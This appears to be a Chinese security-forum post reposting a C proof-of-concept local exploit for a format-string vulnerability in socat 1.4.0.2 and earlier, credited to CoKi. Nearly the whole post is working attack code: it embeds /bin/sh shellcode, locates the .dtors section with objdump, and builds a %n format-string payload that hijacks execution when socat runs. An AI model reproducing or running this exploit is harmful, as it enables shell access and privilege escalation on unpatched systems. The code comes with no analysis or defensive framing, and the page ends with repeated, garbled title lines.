socat <= 1.4.0.2 local exploit (Proof of Concept)

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6819
精华: 835
积分: 36108
阅读权限: 255
性别: 男
来自: 中国
在线时间: 584 小时
注册时间: 2004-6-25
最后登录: 2008-8-19

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-11-2 20:31 只看该作者

socat <= 1.4.0.2 local exploit (Proof of Concept)

文章作者：coki@nosystem.com.ar

复制内容到剪贴板

代码:

/* socat_exp.c

 

  Socat Format String Vulnerability



  socat <= 1.4.0.2 local exploit (Proof of Concept) - SECU



  Tested in Slackware 9.0 / 9.1 / 10.0



  by CoKi <[email]coki@nosystem.com.ar[/email]>

  No System Group - [url]http://www.nosystem.com.ar[/url]

*/



#include <stdio.h>

#include <string.h>



#define PATH "/usr/local/bin/socat"

#define OBJDUMP "/usr/bin/objdump"

#define GREP "/usr/bin/grep"



unsigned char shellcode[]= /* aleph1 shellcode.45b */

   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"

   "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"

   "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e"

   "\x2f\x73\x68";

 

int check(unsigned long addr);



int main(int argc, char *argv[]) {

 

   int i, dtorsaddr;

   unsigned int bal1, bal2, bal3, bal4;

   char temp[512];

   char buffer[1024];

   int cn1, cn2, cn3, cn4;

   FILE *f;

   char *env[3] = {shellcode, NULL};

   int shaddr = 0xbffffffa - strlen(shellcode) - strlen(PATH);

    

   sprintf(temp, "%s -s -j .dtors %s | %s ffffffff", OBJDUMP, PATH, GREP);

   f = popen(temp, "r");

   if(fscanf(f, " %08x", &dtorsaddr) != 1) {

      pclose(f);

      printf("Cannot find .dtors address\n");

      exit(1);

   }

   pclose(f);

   dtorsaddr = dtorsaddr + 4;

 

   printf("\n socat <= 1.4.0.2 local exploit (Proof of Concept)\n");

   printf(" by CoKi <[email]coki@nosystem.com.ar[/email]>\n\n");

   printf(" shellcode address = %.8p\n", shaddr);

   printf(" .dtors address = %.8p\n\n", dtorsaddr);

 

   bzero(temp, sizeof(temp));

   bzero(buffer, sizeof(buffer));

 

   strcat(buffer, "-ly");

    

   for(i = 0; i < 4; i++) {

      bzero(temp, sizeof(temp));

      sprintf(temp, "%s", &dtorsaddr);

      strncat(buffer, temp, 4);

      dtorsaddr++;

   }

 

   bal1 = (shaddr & 0xff000000) >> 24;

   bal2 = (shaddr & 0x00ff0000) >> 16;

   bal3 = (shaddr & 0x0000ff00) >> 8;

   bal4 = (shaddr & 0x000000ff);

 

   cn1 = bal4 - 27 - 16;

   cn1 = check(cn1);

   cn2 = bal3 - bal4;

   cn2 = check(cn2);

   cn3 = bal2 - bal3;

   cn3 = check(cn3);

   cn4 = bal1 - bal2;

   cn4 = check(cn4);



   sprintf(temp, "%%%du%%30\$n%%%du%%31\$n%%%du%%32\$n%%%du%%33\$n", cn1, cn2, cn3, cn4);

          

   strcat(buffer, temp);



   execle(PATH, "socat", buffer, NULL, env);

}



int check(unsigned long addr) {

   char tmp[128];

   snprintf(tmp, sizeof(tmp), "%d", addr);

   if(atoi(tmp) < 1)

      addr = addr + 256;

 

   return addr;

}

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » socat <= 1.4.0.2 local exploit (Proof of Concept)

socat &lt;= 1.4.0.2 local exploit (Proof of Concept)

socat &lt;= 1.4.0.2 local exploit (Proof of Concept)

代码:

socat <= 1.4.0.2 local exploit (Proof of Concept)

socat <= 1.4.0.2 local exploit (Proof of Concept)